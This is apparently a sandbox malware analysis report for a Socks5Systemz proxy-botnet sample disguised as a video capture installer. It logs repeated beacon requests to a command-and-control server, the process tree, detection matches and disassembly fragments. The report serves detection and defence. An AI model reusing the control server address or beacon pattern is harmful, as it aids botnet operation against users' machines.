                                                                                                                                      12192.168.2.749875188.119.66.1854437528C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-18 13:00:35 UTC283OUTGET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                      Host: 188.119.66.185
                                                                                                                                      2024-12-18 13:00:36 UTC200INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                      Date: Wed, 18 Dec 2024 13:00:36 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      X-Powered-By: PHP/7.4.33
                                                                                                                                      2024-12-18 13:00:36 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: e8b723663ec13250


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      13192.168.2.749885188.119.66.1854437528C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-18 13:00:38 UTC283OUTGET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                      Host: 188.119.66.185
                                                                                                                                      2024-12-18 13:00:39 UTC200INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                      Date: Wed, 18 Dec 2024 13:00:39 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      X-Powered-By: PHP/7.4.33
                                                                                                                                      2024-12-18 13:00:39 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: e8b723663ec13250


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      14192.168.2.749891188.119.66.1854437528C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-18 13:00:40 UTC283OUTGET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                      Host: 188.119.66.185
                                                                                                                                      2024-12-18 13:00:41 UTC200INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                      Date: Wed, 18 Dec 2024 13:00:41 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      X-Powered-By: PHP/7.4.33
                                                                                                                                      2024-12-18 13:00:41 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: e8b723663ec13250


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      15192.168.2.749897188.119.66.1854437528C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-18 13:00:43 UTC283OUTGET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                      Host: 188.119.66.185
                                                                                                                                      2024-12-18 13:00:44 UTC200INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                      Date: Wed, 18 Dec 2024 13:00:43 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      X-Powered-By: PHP/7.4.33
                                                                                                                                      2024-12-18 13:00:44 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: e8b723663ec13250


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      16192.168.2.749903188.119.66.1854437528C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-18 13:00:45 UTC283OUTGET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                      Host: 188.119.66.185
                                                                                                                                      2024-12-18 13:00:46 UTC200INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                      Date: Wed, 18 Dec 2024 13:00:46 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      X-Powered-By: PHP/7.4.33
                                                                                                                                      2024-12-18 13:00:46 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: e8b723663ec13250


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      17192.168.2.749909188.119.66.1854437528C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-18 13:00:48 UTC283OUTGET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                      Host: 188.119.66.185
                                                                                                                                      2024-12-18 13:00:49 UTC200INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                      Date: Wed, 18 Dec 2024 13:00:49 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      X-Powered-By: PHP/7.4.33
                                                                                                                                      2024-12-18 13:00:49 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: e8b723663ec13250


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      18192.168.2.749915188.119.66.1854437528C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-18 13:00:51 UTC283OUTGET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                      Host: 188.119.66.185
                                                                                                                                      2024-12-18 13:00:52 UTC200INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                      Date: Wed, 18 Dec 2024 13:00:51 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      X-Powered-By: PHP/7.4.33
                                                                                                                                      2024-12-18 13:00:52 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: e8b723663ec13250


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      19192.168.2.749922188.119.66.1854437528C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-18 13:00:53 UTC283OUTGET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                      Host: 188.119.66.185
                                                                                                                                      2024-12-18 13:00:54 UTC200INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                      Date: Wed, 18 Dec 2024 13:00:54 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      X-Powered-By: PHP/7.4.33
                                                                                                                                      2024-12-18 13:00:54 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: e8b723663ec13250


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      20192.168.2.749928188.119.66.1854437528C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-18 13:00:56 UTC283OUTGET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                      Host: 188.119.66.185
                                                                                                                                      2024-12-18 13:00:56 UTC200INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                      Date: Wed, 18 Dec 2024 13:00:56 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      X-Powered-By: PHP/7.4.33
                                                                                                                                      2024-12-18 13:00:56 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: e8b723663ec13250


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      21192.168.2.749934188.119.66.1854437528C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-18 13:00:58 UTC283OUTGET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                      Host: 188.119.66.185
                                                                                                                                      2024-12-18 13:00:59 UTC200INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                      Date: Wed, 18 Dec 2024 13:00:59 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      X-Powered-By: PHP/7.4.33
                                                                                                                                      2024-12-18 13:00:59 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: e8b723663ec13250


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      22192.168.2.749944188.119.66.1854437528C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-18 13:01:01 UTC283OUTGET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                      Host: 188.119.66.185
                                                                                                                                      2024-12-18 13:01:02 UTC200INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                      Date: Wed, 18 Dec 2024 13:01:02 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      X-Powered-By: PHP/7.4.33
                                                                                                                                      2024-12-18 13:01:02 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: e8b723663ec13250


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      23192.168.2.749950188.119.66.1854437528C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-18 13:01:04 UTC283OUTGET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                      Host: 188.119.66.185
                                                                                                                                      2024-12-18 13:01:05 UTC200INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                      Date: Wed, 18 Dec 2024 13:01:04 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      X-Powered-By: PHP/7.4.33
                                                                                                                                      2024-12-18 13:01:05 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: e8b723663ec13250


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      24192.168.2.749956188.119.66.1854437528C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-18 13:01:07 UTC283OUTGET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                      Host: 188.119.66.185
                                                                                                                                      2024-12-18 13:01:08 UTC200INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                      Date: Wed, 18 Dec 2024 13:01:08 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      X-Powered-By: PHP/7.4.33
                                                                                                                                      2024-12-18 13:01:08 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: e8b723663ec13250


                                                                                                                                      Click to jump to process

                                                                                                                                      Click to jump to process

                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                      Click to jump to process

                                                                                                                                      Target ID:0
                                                                                                                                      Start time:07:59:03
                                                                                                                                      Start date:18/12/2024
                                                                                                                                      Path:C:\Users\user\Desktop\list.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\Desktop\list.exe"
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:3'575'195 bytes
                                                                                                                                      MD5 hash:8EABEA9B74251FE67F24B87E54486643
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:false

                                                                                                                                      Target ID:2
                                                                                                                                      Start time:07:59:03
                                                                                                                                      Start date:18/12/2024
                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user~1\AppData\Local\Temp\is-QMI42.tmp\list.tmp" /SL5="$10438,3326084,56832,C:\Users\user\Desktop\list.exe"
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:706'560 bytes
                                                                                                                                      MD5 hash:048F12CF9C44FE7D997B30F23A9A2228
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000002.00000002.2504041070.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 4%, ReversingLabs
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:false

                                                                                                                                      Target ID:3
                                                                                                                                      Start time:07:59:04
                                                                                                                                      Start date:18/12/2024
                                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                                      Imagebase:0x7ff7b4ee0000
                                                                                                                                      File size:55'320 bytes
                                                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:4
                                                                                                                                      Start time:07:59:05
                                                                                                                                      Start date:18/12/2024
                                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                                                                                                                                      Imagebase:0x7ff7b4ee0000
                                                                                                                                      File size:55'320 bytes
                                                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:false

                                                                                                                                      Target ID:5
                                                                                                                                      Start time:07:59:05
                                                                                                                                      Start date:18/12/2024
                                                                                                                                      Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                                                      Imagebase:0x7ff63f6b0000
                                                                                                                                      File size:329'504 bytes
                                                                                                                                      MD5 hash:3BA1A18A0DC30A0545E7765CB97D8E63
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:false

                                                                                                                                      Target ID:6
                                                                                                                                      Start time:07:59:05
                                                                                                                                      Start date:18/12/2024
                                                                                                                                      Path:C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe" -i
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:3'409'347 bytes
                                                                                                                                      MD5 hash:A5B9D0E5F04BC3D01C9E97A61F27EB8F
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000006.00000000.1278089923.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000006.00000002.2503661880.0000000002B5B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe, Author: Joe Security
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                      • Detection: 38%, ReversingLabs
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:false

                                                                                                                                      Target ID:7
                                                                                                                                      Start time:07:59:06
                                                                                                                                      Start date:18/12/2024
                                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                                      Imagebase:0x7ff7b4ee0000
                                                                                                                                      File size:55'320 bytes
                                                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:false

                                                                                                                                      Target ID:8
                                                                                                                                      Start time:07:59:06
                                                                                                                                      Start date:18/12/2024
                                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                                                                                                                                      Imagebase:0x7ff7b4ee0000
                                                                                                                                      File size:55'320 bytes
                                                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:false

                                                                                                                                      Target ID:9
                                                                                                                                      Start time:07:59:09
                                                                                                                                      Start date:18/12/2024
                                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\svchost.exe -k LocalService -s W32Time
                                                                                                                                      Imagebase:0x7ff7b4ee0000
                                                                                                                                      File size:55'320 bytes
                                                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:false

                                                                                                                                      Target ID:12
                                                                                                                                      Start time:09:47:57
                                                                                                                                      Start date:18/12/2024
                                                                                                                                      Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                                                      Imagebase:0x7ff7093d0000
                                                                                                                                      File size:468'120 bytes
                                                                                                                                      MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:13
                                                                                                                                      Start time:09:47:57
                                                                                                                                      Start date:18/12/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Reset < >

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:21.5%
                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                        Signature Coverage:2.4%
                                                                                                                                        Total number of Nodes:1520
                                                                                                                                        Total number of Limit Nodes:22
                                                                                                                                        execution_graph 5445 407548 5446 407554 CloseHandle 5445->5446 5447 40755d 5445->5447 5446->5447 6682 402b48 RaiseException 5887 407749 5888 4076dc WriteFile 5887->5888 5893 407724 5887->5893 5889 4076e8 5888->5889 5890 4076ef 5888->5890 5891 40748c 35 API calls 5889->5891 5892 407700 5890->5892 5894 4073ec 34 API calls 5890->5894 5891->5890 5893->5887 5895 4077e0 5893->5895 5894->5892 5896 4078db InterlockedExchange 5895->5896 5898 407890 5895->5898 5897 4078e7 5896->5897 6683 40294a 6684 402952 6683->6684 6685 402967 6684->6685 6686 403554 4 API calls 6684->6686 6686->6684 6687 403f4a 6688 403f53 6687->6688 6689 403f5c 6687->6689 6691 403f07 6688->6691 6694 403f09 6691->6694 6693 403f3c 6693->6689 6695 403154 4 API calls 6694->6695 6697 403e9c 6694->6697 6700 403f3d 6694->6700 6714 403e9c 6694->6714 6695->6694 6696 403ef2 6699 402674 4 API calls 6696->6699 6697->6693 6697->6696 6702 403ea9 6697->6702 6705 403e8e 6697->6705 6704 403ecf 6699->6704 6700->6689 6703 402674 4 API calls 6702->6703 6702->6704 6703->6704 6704->6689 6706 403e4c 6705->6706 6707 403e62 6706->6707 6708 403e7b 6706->6708 6710 403e67 6706->6710 6709 403cc8 4 API calls 6707->6709 6711 402674 4 API calls 6708->6711 6709->6710 6712 403e78 6710->6712 6713 402674 4 API calls 6710->6713 6711->6712 6712->6696 6712->6702 6713->6712 6715 403ed7 6714->6715 6721 403ea9 6714->6721 6716 403ef2 6715->6716 6718 403e8e 4 API calls 6715->6718 6719 402674 4 API calls 6716->6719 6717 403ecf 6717->6694 6720 403ee6 6718->6720 6719->6717 6720->6716 6720->6721 6721->6717 6722 402674 4 API calls 6721->6722 6722->6717 6241 40ac4f 6242 40abc1 6241->6242 6243 4094d8 9 API calls 6242->6243 6245 40abed 6242->6245 6243->6245 6244 40ac06 6246 40ac1a 6244->6246 6247 40ac0f DestroyWindow 6244->6247 6245->6244 6248 40ac00 RemoveDirectoryA 6245->6248 6249 40ac42 6246->6249 6250 40357c 4 API calls 6246->6250 6247->6246 6248->6244 6251 40ac38 6250->6251 6252 4025ac 4 API calls 6251->6252 6252->6249 6253 403a52 6254 403a74 6253->6254 6255 403a5a WriteFile 6253->6255 6255->6254 6256 403a78 GetLastError 6255->6256 6256->6254 6257 402654 6258 403154 4 API calls 6257->6258 6259 402614 6258->6259 6260 403154 4 API calls 6259->6260 6261 402632 6259->6261 6260->6261 6262 40ac56 6263 40ac5d 6262->6263 6265 40ac88 6262->6265 6272 409448 6263->6272 6267 403198 4 API calls 6265->6267 6266 40ac62 6266->6265 6269 40ac80 MessageBoxA 6266->6269 6268 40acc0 6267->6268 6270 403198 4 API calls 6268->6270 6269->6265 6271 40acc8 6270->6271 6273 409454 GetCurrentProcess OpenProcessToken 6272->6273 6274 4094af ExitWindowsEx 6272->6274 